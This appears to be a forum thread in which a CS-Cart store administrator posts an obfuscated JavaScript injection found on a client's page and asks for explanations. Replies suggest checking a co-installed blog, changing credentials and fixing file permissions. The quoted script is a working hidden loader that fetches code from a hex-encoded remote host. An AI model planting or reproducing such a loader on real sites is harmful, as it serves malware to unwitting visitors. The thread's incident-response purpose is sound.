We have numerous CS-Cart sites for our clients, and today one of them got this beauty placed into the HTML code for one of the content pages.
<br />
<script type="text/javascript">// <![CDATA[<br />
document.write('<' + 'script type="text/javascript" language="javascript" id="47x1dlm1so"></' + 'script>');<br />
var j = document.getElementById("47x1dlm1so");<br />
var s = document.location.host; <br />
var s1 = ""; var qcl2q = 10; <br />
for (var i = 0; i < s.length; i++) { var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q; r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57); s1 += String.fromCharCode(r8j8tnwtk76gj); qcl2q = s.charCodeAt(i);} <br />
s1 = s1.replace(/[^a-zA-Z0-9]/g, "");<br />
if( document.cookie.indexOf("google_api=1;") == -1 ) {j.src = "\x68\x74t\x70\x3a\x2f\x2f"+s1+".\x70e\x67\x75a\x72\x64s\x2ec\x63/\x62\x38c\x37\x66\x38f\x33\x69\x71\x2f\x67et\x2e\x6a\x73";}<br />
delete s; delete s1;<br />
// ]]></script>
```<br />
<br />
Does anyone else know of this kind of activity occurring? And any reasons as to why it might have?<br />
<br />
It's a Windows server using CS-Cart 2.2.4
I don't really know this exact problem, but I had a problem with Wordpress and this happening. Basically the client didn't keep up on his Wordpress updates and there was a hack. This hack not only affected his Wordpress site, but also changed a ton of files on his CS-Cart site. It was a huge pain in the neck to clean up and fix, but we ended up getting it.
Obviously anything is possible, but if you have a blog installed where your CS-Cart is installed, I'd look there first.
I hope that helps.
Brandon
[quote name='brandonvd' timestamp='1390922811' post='176197']
Obviously anything is possible, but if you have a blog installed where your CS-Cart is installed, I'd look there first.
[/quote]
And change all server passwords (i.e. for server access, ftp, mysql credentials, control panel logins, etc) immediately.
And don't make all the directories 777 and files 666 like the knowledge base wants you to. Huge security risk.
Having your server (Apache, FTP and PHP) set up correctly can eliminate many of the common security holes that are attacked.
change passwords frequently for FTP and the cpanel account.
nah you can decompile the code, it's a hack in joomla/wordpress anything you want, some developers write these hacks into plugins,addons etc and pput on market for freeā¦ then they put a comand and conquer bot on your server and can actually worm themselves anywhere
you need to find all source of it this one pulls a js from a site as seen on DDecode - Hex,Octal,HTML Decoder
Best bet is having host run any CMS in own VPS but hey you get what you pay for, if you need a TRUE server contact me, you can have any distro you need and you are alone on the server